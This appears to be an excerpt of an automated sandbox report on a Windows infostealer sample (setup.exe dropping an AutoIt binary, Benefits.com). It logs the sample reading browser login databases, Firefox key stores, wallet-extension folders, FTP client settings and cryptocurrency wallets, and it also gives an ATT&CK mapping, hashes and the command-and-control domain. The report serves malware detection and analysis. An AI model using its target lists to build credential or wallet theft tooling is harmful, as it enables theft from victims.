      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\224177\Benefits.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation
      1
      DLL Side-Loading
      12
      Process Injection
      11
      Masquerading
      2
      OS Credential Dumping
      21
      Security Software Discovery
      Remote Services11
      Input Capture
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      11
      Input Capture
      21
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Archive Collected Data
      2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin Shares31
      Data from Local System
      13
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS13
      File and Directory Discovery
      Distributed Component Object Model1
      Clipboard Data
      Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets25
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      setup.exe5%ReversingLabsWin32.Ransomware.Generic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\224177\Benefits.com0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Training0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://vividimaginatigon.top/api0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      vividimaginatigon.top
      172.67.158.151
      truetrue
        unknown
        aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTD
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://vividimaginatigon.top/apitrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XBenefits.com, 0000000D.00000000.2127634628.0000000000945000.00000002.00000001.01000000.00000008.sdmp, Verde.9.dr, Benefits.com.2.drfalse
            high
            http://nsis.sf.net/NSIS_ErrorErrorsetup.exefalse
              high
              https://www.autoitscript.com/autoit3/Verde.9.dr, Benefits.com.2.drfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                172.67.158.151
                vividimaginatigon.topUnited States
                13335CLOUDFLARENETUStrue
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1604056
                Start date and time:2025-01-31 19:53:53 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 5s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:setup.exe
                Detection:MAL
                Classification:mal96.troj.spyw.evad.winEXE@26/24@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 33
                • Number of non-executed functions: 39
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: setup.exe
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                172.67.158.151MsSgrmLpac.exeGet hashmaliciousUnknownBrowse
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttp://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=s1DYVAfXq0GW6Lk4FvadfsA_WbUNnbROrKLIbauDU1xUNzBDNkg0RFRSSFMwVldFOE42WVc1Wkg3Ty4uGet hashmaliciousHTMLPhisherBrowse
                  • 104.21.2.8
                  https://clickme.thryv.com/ls/click?upn=u001.y1sebFAUQE72cFLuIemaNE9QqkUqSGMnexcl4mnzcSl1rtf0On3WcCscoGkiuyUASBB-_u4suetZUr3cwQv7VcFyd1N3x5QqgQ9HrMFPRZOwvHuNVuCY104dcUZUVtZ1z8S7kN-2FX71IAly8brTgTbwT84EFGS-2FNXARw-2BtHV2WYW-2FKY3HmhhLG2ZL6MgAesy2NYzc5EYI4xSX17R3XcXLlyuygPjobmj2lDuc1P5C-2FNgDB5D26w1DU0jDJ0XvYfcp0Tlgt4kit4FohnVt4DgZPdFA8ceq5ZcCw4QHdcMP9e0ITdGhQFdK68cChoxLQOcOnpg0kvvvwYfCshsQhzMAnMNSi-2Fq61zpPq9Pb11aTq-2BYE5ib3gcPyvjJAlHpFqzDww-2FJZeQbyVfOpMOay4Cg-2B9vBdjQw-3D-3D#bWFydHkubGludGhpY3VtQGlmaXQuY29tGet hashmaliciousHTMLPhisherBrowse
                  • 172.67.210.104
                  EFT-Remittance-Slip-for-Due-Invoice.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                  • 104.21.64.1
                  5646654.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                  • 104.21.80.1
                  random.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RedLineBrowse
                  • 104.26.13.31
                  random.exeGet hashmaliciousVidarBrowse
                  • 172.64.41.3
                  random.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                  • 104.21.18.116
                  random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, VidarBrowse
                  • 104.21.29.142
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 104.21.29.142
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RedLineBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Stealc, VidarBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  DJMvyf95wu.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.158.151
                  random.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                  • 172.67.158.151
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\224177\Benefits.comrandom.exeGet hashmaliciousVidarBrowse
                    n395XXd8UE.exeGet hashmaliciousLummaC StealerBrowse
                      p199AjsEFs.exeGet hashmaliciousAmadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, StealcBrowse
                        New v2.2.0.exeGet hashmaliciousLummaC StealerBrowse
                          A_acid11.exeGet hashmaliciousLummaC StealerBrowse
                            2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                              random.exeGet hashmaliciousAmadey, AsyncRAT, LummaC Stealer, PureLog Stealer, VidarBrowse
                                random.exeGet hashmaliciousVidarBrowse
                                  random.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):947288
                                    Entropy (8bit):6.630612696399572
                                    Encrypted:false
                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                    MD5:62D09F076E6E0240548C2F837536A46A
                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: random.exe, Detection: malicious, Browse
                                    • Filename: n395XXd8UE.exe, Detection: malicious, Browse
                                    • Filename: p199AjsEFs.exe, Detection: malicious, Browse
                                    • Filename: New v2.2.0.exe, Detection: malicious, Browse
                                    • Filename: A_acid11.exe, Detection: malicious, Browse
                                    • Filename: 2E02vIiMfd.exe, Detection: malicious, Browse
                                    • Filename: random.exe, Detection: malicious, Browse
                                    • Filename: random.exe, Detection: malicious, Browse
                                    • Filename: random.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):505966
                                    Entropy (8bit):7.999691333439623
                                    Encrypted:true
                                    SSDEEP:12288:+mrNMQZ6KFovILBRcHvDvaib1DaY633eUN7dPVldapuz:+mvvGILaWkFaY63OU1vLWk
                                    MD5:69958243BC5C2E5C6095C302B3553EA6
                                    SHA1:5290506B80C27A8390452C74180802E24A99A9E1
                                    SHA-256:BB07AF249BF75123F4101918F83DB1AC3F35BD3B25C07E24DC90F112797916DD
                                    SHA-512:02271F91DEEC06ACF9609125B4B62CDCCD12E4233D39C47233E33557427109549D2645809ED9161A3946834504AF9AC11E9F8AA1D2C2D989B9BC39E27392FEBA
                                    Malicious:false
